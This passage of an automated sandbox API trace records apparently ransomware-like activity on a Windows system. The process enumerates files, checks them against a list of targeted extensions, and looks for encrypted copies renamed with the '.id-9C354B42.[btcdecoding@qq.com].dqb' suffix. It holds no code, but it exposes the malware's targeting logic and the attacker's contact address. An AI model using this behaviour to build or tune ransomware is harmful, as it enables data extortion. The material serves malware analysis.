dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d4 [0271.382] GetFileSizeEx (in: hFile=0x1d4, lpFileSize=0x2fcff1c | out: lpFileSize=0x2fcff1c*=157292) returned 1 [0271.382] CloseHandle (hObject=0x1d4) returned 1 [0271.382] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboynotesbackground_pal.wmv")) returned 0x20 [0271.382] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground_PAL.wmv.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboynotesbackground_pal.wmv.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0271.382] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboynotesbackground_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0271.382] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground_PAL.wmv") returned 82 [0271.382] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground_PAL.wmv") returned 82 [0271.382] lstrlenW (lpString=".doc") returned 4 [0271.382] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0271.382] lstrlenW (lpString=".docx") returned 5 [0271.382] lstrcmpiW (lpString1=".docx", lpString2="L.wmv") returned -1 [0271.382] lstrlenW (lpString=".pdf") returned 4 [0271.382] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0271.383] lstrlenW (lpString=".xls") returned 4 [0271.383] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0271.383] lstrlenW (lpString=".xlsx") returned 5 [0271.383] lstrcmpiW (lpString1=".xlsx", lpString2="L.wmv") returned -1 [0271.383] lstrlenW (lpString=".ppt") returned 4 [0271.383] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0271.383] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground_PAL.wmv") returned 82 [0271.383] lstrlenW (lpString=".zip") returned 4 [0271.383] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0271.383] lstrlenW (lpString=".rar") returned 4 [0271.383] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0271.383] lstrlenW (lpString=".bz2") returned 4 [0271.383] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0271.383] lstrlenW (lpString=".7z") returned 3 [0271.383] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0271.383] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground_PAL.wmv") returned 82 [0271.383] lstrlenW (lpString=".dbf") returned 4 [0271.383] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0271.383] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground_PAL.wmv") returned 82 [0271.383] lstrlenW (lpString=".1cd") returned 4 [0271.383] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0271.383] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground_PAL.wmv") returned 82 [0271.383] lstrlenW (lpString=".jpg") returned 4 [0271.383] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0271.383] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground_PAL.wmv") returned 82 [0271.383] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground_PAL.wmv") returned 82 [0271.383] lstrlenW (lpString=".doc") returned 4 [0271.383] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0271.383] lstrlenW (lpString=".docx") returned 5 [0271.383] lstrcmpiW (lpString1=".docx", lpString2="L.wmv") returned -1 [0271.383] lstrlenW (lpString=".pdf") returned 4 [0271.383] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0271.383] lstrlenW (lpString=".xls") returned 4 [0271.384] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0271.384] lstrlenW (lpString=".xlsx") returned 5 [0271.384] lstrcmpiW (lpString1=".xlsx", lpString2="L.wmv") returned -1 [0271.384] lstrlenW (lpString=".ppt") returned 4 [0271.384] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0271.384] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground_PAL.wmv") returned 82 [0271.384] lstrlenW (lpString=".zip") returned 4 [0271.384] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0271.384] lstrlenW (lpString=".rar") returned 4 [0271.384] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0271.384] lstrlenW (lpString=".bz2") returned 4 [0271.384] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0271.384] lstrlenW (lpString=".7z") returned 3 [0271.384] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0271.384] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground_PAL.wmv") returned 82 [0271.384] lstrlenW (lpString=".dbf") returned 4 [0271.384] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0271.384] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground_PAL.wmv") returned 82 [0271.384] lstrlenW (lpString=".1cd") returned 4 [0271.384] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0271.384] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground_PAL.wmv") returned 82 [0271.384] lstrlenW (lpString=".jpg") returned 4 [0271.384] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0271.384] lstrcmpiW (lpString1=".wmv", lpString2=".dqb") returned 1 [0271.384] lstrlenW (lpString="BabyBoyScenesBackground.wmv") returned 27 [0271.384] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboyscenesbackground.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0271.524] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x2fcff1c | out: lpFileSize=0x2fcff1c*=149292) returned 1 [0271.524] CloseHandle (hObject=0x1f4) returned 1 [0271.524] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboyscenesbackground.wmv")) returned 0x20 [0271.711] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground.wmv.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboyscenesbackground.wmv.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0271.713] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboyscenesbackground.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0271.713] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground.wmv") returned 79 [0271.713] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground.wmv") returned 79 [0271.713] lstrlenW (lpString=".doc") returned 4 [0271.713] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0271.713] lstrlenW (lpString=".docx") returned 5 [0271.713] lstrcmpiW (lpString1=".docx", lpString2="d.wmv") returned -1 [0271.713] lstrlenW (lpString=".pdf") returned 4 [0271.713] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0271.713] lstrlenW (lpString=".xls") returned 4 [0271.713] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0271.713] lstrlenW (lpString=".xlsx") returned 5 [0271.713] lstrcmpiW (lpString1=".xlsx", lpString2="d.wmv") returned -1 [0271.714] lstrlenW (lpString=".ppt") returned 4 [0271.714] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0271.714] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground.wmv") returned 79 [0271.714] lstrlenW (lpString=".zip") returned 4 [0271.714] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0271.714] lstrlenW (lpString=".rar") returned 4 [0271.714] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0271.714] lstrlenW (lpString=".bz2") returned 4 [0271.714] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0271.714] lstrlenW (lpString=".7z") returned 3 [0271.714] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0271.714] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground.wmv") returned 79 [0271.714] lstrlenW (lpString=".dbf") returned 4 [0271.714] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0271.714] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground.wmv") returned 79 [0271.714] lstrlenW (lpString=".1cd") returned 4 [0271.714] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0271.714] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground.wmv") returned 79 [0271.714] lstrlenW (lpString=".jpg") returned 4 [0271.714] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0271.714] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground.wmv") returned 79 [0271.714] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground.wmv") returned 79 [0271.714] lstrlenW (lpString=".doc") returned 4 [0271.714] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0271.714] lstrlenW (lpString=".docx") returned 5 [0271.714] lstrcmpiW (lpString1=".docx", lpString2="d.wmv") returned -1 [0271.714] lstrlenW (lpString=".pdf") returned 4 [0271.714] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0271.714] lstrlenW (lpString=".xls") returned 4 [0271.714] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0271.714] lstrlenW (lpString=".xlsx") returned 5 [0271.714] lstrcmpiW (lpString1=".xlsx", lpString2="d.wmv") returned -1 [0271.714] lstrlenW (lpString=".ppt") returned 4 [0271.714] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0271.715] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground.wmv") returned 79 [0271.715] lstrlenW (lpString=".zip") returned 4 [0271.715] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0271.715] lstrlenW (lpString=".rar") returned 4 [0271.715] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0271.715] lstrlenW (lpString=".bz2") returned 4 [0271.715] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0271.715] lstrlenW (lpString=".7z") returned 3 [0271.715] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0271.715] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground.wmv") returned 79 [0271.715] lstrlenW (lpString=".dbf") returned 4 [0271.715] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0271.715] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground.wmv") returned 79 [0271.715] lstrlenW (lpString=".1cd") returned 4 [0271.715] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0271.715] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground.wmv") returned 79 [0271.715] lstrlenW (lpString=".jpg") returned 4 [0271.715] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0271.715] lstrcmpiW (lpString1=".png", lpString2=".dqb") returned 1 [0271.715] lstrlenW (lpString="nav_leftarrow.png") returned 17 [0271.715] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_leftarrow.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\nav_leftarrow.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0271.720] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x2fcff1c | out: lpFileSize=0x2fcff1c*=4503) returned 1 [0271.720] CloseHandle (hObject=0x320) returned 1 [0271.720] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_leftarrow.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\nav_leftarrow.png")) returned 0x20 [0271.720] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_leftarrow.png.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\nav_leftarrow.png.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0271.720] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_leftarrow.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\nav_leftarrow.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0271.721] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_leftarrow.png") returned 69 [0271.721] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_leftarrow.png") returned 69 [0271.721] lstrlenW (lpString=".doc") returned 4 [0271.721] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0271.721] lstrlenW (lpString=".docx") returned 5 [0271.722] lstrcmpiW (lpString1=".docx", lpString2="w.png") returned -1 [0271.722] lstrlenW (lpString=".pdf") returned 4 [0271.722] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0271.722] lstrlenW (lpString=".xls") returned 4 [0271.722] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0271.722] lstrlenW (lpString=".xlsx") returned 5 [0271.722] lstrcmpiW (lpString1=".xlsx", lpString2="w.png") returned -1 [0271.722] lstrlenW (lpString=".ppt") returned 4 [0271.722] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0271.722] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_leftarrow.png") returned 69 [0271.722] lstrlenW (lpString=".zip") returned 4 [0271.722] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0271.722] lstrlenW (lpString=".rar") returned 4 [0271.722] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0271.722] lstrlenW (lpString=".bz2") returned 4 [0271.722] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0271.722] lstrlenW (lpString=".7z") returned 3 [0271.722] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0271.722] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_leftarrow.png") returned 69 [0271.722] lstrlenW (lpString=".dbf") returned 4 [0271.722] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0271.722] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_leftarrow.png") returned 69 [0271.722] lstrlenW (lpString=".1cd") returned 4 [0271.722] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0271.722] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_leftarrow.png") returned 69 [0271.722] lstrlenW (lpString=".jpg") returned 4 [0271.722] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0271.722] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_leftarrow.png") returned 69 [0271.722] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_leftarrow.png") returned 69 [0271.722] lstrlenW (lpString=".doc") returned 4 [0271.722] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0271.722] lstrlenW (lpString=".docx") returned 5 [0271.722] lstrcmpiW (lpString1=".docx", lpString2="w.png") returned -1 [0271.723] lstrlenW (lpString=".pdf") returned 4 [0271.723] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0271.723] lstrlenW (lpString=".xls") returned 4 [0271.723] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0271.723] lstrlenW (lpString=".xlsx") returned 5 [0271.723] lstrcmpiW (lpString1=".xlsx", lpString2="w.png") returned -1 [0271.723] lstrlenW (lpString=".ppt") returned 4 [0271.723] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0271.723] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_leftarrow.png") returned 69 [0271.723] lstrlenW (lpString=".zip") returned 4 [0271.723] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0271.723] lstrlenW (lpString=".rar") returned 4 [0271.723] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0271.723] lstrlenW (lpString=".bz2") returned 4 [0271.723] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0271.723] lstrlenW (lpString=".7z") returned 3 [0271.723] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0271.723] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_leftarrow.png") returned 69 [0271.723] lstrlenW (lpString=".dbf") returned 4 [0271.723] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0271.723] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_leftarrow.png") returned 69 [0271.723] lstrlenW (lpString=".1cd") returned 4 [0271.723] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0271.723] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_leftarrow.png") returned 69 [0271.723] lstrlenW (lpString=".jpg") returned 4 [0271.723] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0271.723] lstrcmpiW (lpString1=".png", lpString2=".dqb") returned 1 [0271.723] lstrlenW (lpString="16_9-frame-image-mask.png") returned 25 [0271.723] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-image-mask.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\16_9-frame-image-mask.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0271.725] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x2fcff1c | out: lpFileSize=0x2fcff1c*=1551) returned 1 [0271.725] CloseHandle (hObject=0x31c) returned 1 [0271.725] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-image-mask.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\16_9-frame-image-mask.png")) returned 0x20 [0271.726] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-image-mask.png.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\16_9-frame-image-mask.png.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0271.727] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-image-mask.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\16_9-frame-image-mask.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0271.728] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-image-mask.png") returned 78 [0271.728] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-image-mask.png") returned 78 [0271.728] lstrlenW (lpString=".doc") returned 4 [0271.728] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0271.728] lstrlenW (lpString=".docx") returned 5 [0271.728] lstrcmpiW (lpString1=".docx", lpString2="k.png") returned -1 [0271.728] lstrlenW (lpString=".pdf") returned 4 [0271.728] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0271.728] lstrlenW (lpString=".xls") returned 4 [0271.728] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0271.728] lstrlenW (lpString=".xlsx") returned 5 [0271.728] lstrcmpiW (lpString1=".xlsx", lpString2="k.png") returned -1 [0271.728] lstrlenW (lpString=".ppt") returned 4 [0271.728] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0271.728] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-image-mask.png") returned 78 [0271.728] lstrlenW (lpString=".zip") returned 4 [0271.728] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0271.728] lstrlenW (lpString=".rar") returned 4 [0271.728] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0271.728] lstrlenW (lpString=".bz2") returned 4 [0271.728] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0271.728] lstrlenW (lpString=".7z") returned 3 [0271.728] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0271.728] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-image-mask.png") returned 78 [0271.728] lstrlenW (lpString=".dbf") returned 4 [0271.728] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0271.728] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-image-mask.png") returned 78 [0271.728] lstrlenW (lpString=".1cd") returned 4 [0271.728] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0271.728] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-image-mask.png") returned 78 [0271.728] lstrlenW (lpString=".jpg") returned 4 [0271.729] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0271.729] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-image-mask.png") returned 78 [0271.729] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-image-mask.png") returned 78 [0271.729] lstrlenW (lpString=".doc") returned 4 [0271.729] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0271.729] lstrlenW (lpString=".docx") returned 5 [0271.729] lstrcmpiW (lpString1=".docx", lpString2="k.png") returned -1 [0271.729] lstrlenW (lpString=".pdf") returned 4 [0271.729] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0271.729] lstrlenW (lpString=".xls") returned 4 [0271.729] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0271.729] lstrlenW (lpString=".xlsx") returned 5 [0271.729] lstrcmpiW (lpString1=".xlsx", lpString2="k.png") returned -1 [0271.729] lstrlenW (lpString=".ppt") returned 4 [0271.729] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0271.729] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-image-mask.png") returned 78 [0271.729] lstrlenW (lpString=".zip") returned 4 [0271.729] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0271.729] lstrlenW (lpString=".rar") returned 4 [0271.729] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0271.729] lstrlenW (lpString=".bz2") returned 4 [0271.729] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0271.729] lstrlenW (lpString=".7z") returned 3 [0271.729] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0271.729] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-image-mask.png") returned 78 [0271.729] lstrlenW (lpString=".dbf") returned 4 [0271.729] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0271.729] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-image-mask.png") returned 78 [0271.729] lstrlenW (lpString=".1cd") returned 4 [0271.729] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0271.729] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-image-mask.png") returned 78 [0271.729] lstrlenW (lpString=".jpg") returned 4 [0271.729] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0271.730] lstrcmpiW (lpString1=".png", lpString2=".dqb") returned 1 [0271.730] lstrlenW (lpString="babypink.png") returned 12 [0271.730] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\babypink.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\babypink.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0271.730] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x2fcff1c | out: lpFileSize=0x2fcff1c*=19477) returned 1 [0271.730] CloseHandle (hObject=0x320) returned 1 [0271.730] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\babypink.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\babypink.png")) returned 0x20 [0271.730] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\babypink.png.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\babypink.png.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0271.730] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\babypink.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\babypink.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0271.730] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\babypink.png") returned 65 [0271.730] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\babypink.png") returned 65 